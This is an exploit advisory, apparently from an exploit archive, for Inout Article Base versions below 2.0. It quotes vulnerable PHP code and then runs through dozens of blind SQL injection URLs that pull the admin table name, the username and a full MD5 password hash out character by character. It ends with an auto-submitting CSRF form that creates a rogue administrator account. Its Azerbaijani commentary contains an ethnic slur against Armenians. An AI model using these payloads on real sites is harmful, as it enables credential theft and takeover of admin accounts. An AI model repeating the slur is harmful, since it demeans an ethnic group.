============
Vulnerable Software: Inout Article Base Ultimate Version: < 2
Vulnerabilities: Blind SQLi && CROSS Site Request Forgery.
Discovered and Exploited in Wild
Vendor: inoutscripts.com
============
About software version:
============
I can't say what exact version affected but:(it is probably version < 2.0))
Here is what it's Upgrade.html says:
*Inout ArticleBase-Upgradtion to version 2.0*
If you are currently using old version of Inout ArticleBase and want to upgrade
to version 2.0 of Inout ArticleBase, please follow the instructions given below.
etc...
============
=========================VULNERABLE CODE=======================================
//controller/ViewController.class.php
function getarticlecount($cid)
{
$cat= $this->getSubcategoryList($cid);
$this->loadLibrary("settings");
$set=new settings("nesote_inoutarticle_settings");
$set->loadValues();
$show_articles=$set->getValue("show_ articles_selected_language");
$lang_id=$this->getlang_id();
if($show_articles==1)
$languagecondition="and lang_id='".$lang_id."'";
else
$languagecondition="";
//echo $parent;
$db= new NesoteDALController();
if($cat!=null)
{
$len=strlen($cat);
$cat=substr($cat,0,($len-2));
}
else
$cat="'".$cid."'";
$total=$db->total(array("c"=>"nesote_inoutarticle_categories","a"=>"nesote_inoutarticle_articles"),"a.cid=c.id and a.cid in($cat) and a.status=? and c.status=? $languagecondition",array(1,1));
// echo $db->getQuery();
return $total;
}
================================EXPLOITATION===================================
On TRUE returns: normal page to articles.
On FALSE returns: No article posted yet.
//TRUE verir bu.
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)='1',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8
http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(length(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='i',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8
http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='e',benchmark(10000000,md5(1)),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if('a'='ab',1,0))-- and 8=('8
TRUE DA xeberlerli sehife
false-de
No article posted yet.
AND logical ile.
password adli column burda olmalidir:
//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
1-CI SIMVOL c
2-ci simvol: l
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,2,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
3-de: a
www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,3,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
4-de s
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,4,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
5-de: s
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,5,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
6-da i
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,6,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
7-de f
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,7,1)='f',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
8-de i
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,8,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
9-da e
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,9,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
10-da d
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,10,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
11-de s
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,11,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
12-de _
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,12,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
hal hazirda classifieds_
13-de: n
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,13,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
classifieds_n
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(table_name)='46',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
46 simvol! Burda deyiblere anovu sikim ermeni!!!!!!!!!!!
Sikdirdi bu table baxaq basqasina.
======================================================
24-e qeder cixmir
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(table_name)!='0',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 25)-- and 8=('8
14-cu simvol: e
15-ci simvol: s
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,15,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
16-ci simvol: o
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,16,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
17-ci simvol: t
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,17,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
18-ci simvol: e
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,18,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
davamini gedek gorek ne verir.
19-da _ olmalidir yoxlayaq yene de.
duzdur
19-cu simvol: _
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,19,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
20-ci simvol: i
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,20,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
21-ci simvol: n
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,21,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
22-ci simvol: o
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,22,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
23-cu simvol: u
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,23,1)='u',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
24-cu simvol: t
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,24,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
25-ci simvol: a
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,25,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
26-ci simvol: r
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,26,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
27-ci simvol: t
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,27,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
28-ci simvol: i
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,28,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
29-cu simvol: c
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,29,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
30-cu simvol: l
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,30,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
31-ci simvol: e
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,31,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
32-ci simvol: _
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,32,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
33-cu simvol: a
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,33,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
34-cu simvol: d
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,34,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
deyesen adminlikdir burda duz cixiriq ustune artiq.
35-ci simvol: m
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,35,1)='m',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
36-ci simvol: i
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,36,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
37-ci simvol: n
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,37,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
38-ci simvol: i
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,38,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
39-cu simvol: s
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,39,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
40-ci simvol: t
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,40,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
41-ci simvol: r
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,41,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
42-ci simvol: a
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,42,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
43-cu simvol: t
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,43,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
44-cu simvol: o
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,44,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
45-ci simvol: r
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,45,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
46-ci simvol: s
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
Bu axirinci simvol idi cunki TRUE qaytardi yoxlanis:
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,100)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
table_name-i yigaq.
mysql> select length('classifieds_nesote_inoutarticle_administrators') \g
----------------------------------------------------------
| length('classifieds_nesote_inoutarticle_administrators') |
----------------------------------------------------------
| 46 |
----------------------------------------------------------
1 row in set (0.00 sec)
mysql>
//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,100)='classifieds_nesote_inoutarticle_administrators',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8
burda bizde username
id
password columnlari var.
Oxay bavan qurban 1 username var burda 100% adminlikdir)))))))
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(username)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC)-- and 8=('8
//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(username,1,10)='admin',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
menasiz idi amma yene de 100 olcek bir bicek
//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(username)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
MD5-dir pass:
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(password)='32',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
Cekek getsin naxuy:
========================================================
qancigin parolunun md5-i nin 1ci simvolu:
1-ci simvol: f
//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,1,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
2-ci simvol: 8
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,2,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
3-cu simvol: c
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,3,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
4-cu simvol: b
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,4,1)='b',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
5-ci simvol: e
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,5,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
6-ci simvol: 6
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,6,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
7-ci simvol: 3
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,7,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
8-ci simvol: 7
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,8,1)='7',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
9-cu simvol: 1
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,9,1)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
10-cu simvol: 6
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,10,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
11-ci simvol: 4
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,11,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
12-ci simvol: 2
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,12,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
13-cu simvol: 5
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,13,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
14-cu simvol: 4
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,14,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
15-ci simvol: 4
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,15,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
16-ci simvol: 6
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,16,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
17-ci simvol: 2
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,17,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
18-ci simvol: 9
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,18,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
19-ci simvol: 5
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,19,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
20-ci simvol: 2
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,20,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
21-ci simvol: f
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,21,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
22-ci simvol: d
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,22,1)='d',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
23-cu simvol: a
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,23,1)='a',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
24-cu simvol: 4
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,24,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
25-ci simvol: c
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,25,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
26-ci simvol: e
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,26,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
27-ci simvol: 2
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,27,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
28-ci simvol: 3
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,28,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
29-cu simvol: 9
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,29,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
30-cu simvol: 8
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,30,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
31-ci simvol: e
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,31,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
32-ci simvol: 0
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,32,1)='0',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================
CSRF add admin:
username: blackhatz
password: blackhatz
email: blackhatz@blackhatz.tld
<body onload="javascript:document.forms[0].submit()">
<form name="addsubadmin" id="addsubadmin" enctype="multipart/form-data" method="POST" action="http://www.xxxxxxxxxxxx.tld/admin/permissions/addsubadminprocess">
<input name="username" type="text" id="username" value="blackhatz">
<input name="name" type="text" id="name" value="blackhatz">
<input name="password" type="password" id="password" value="blackhatz">
<input name="cpassword" type="password" id="cpassword" value="blackhatz">
<input name="email" type="text" id="email" value="blackhatz@blackhatz.tld">
<select name="gid" id="gid" >
<option value="1"></option>
<option value="1">admins selected="selected"</option>
</select>
<input name="pid" type="hidden" id="pid" value="{$pid}">
<!-- <input type="submit" name="Submit" value="Submit">-->
</form>
================ THE END =====================
================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua
to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep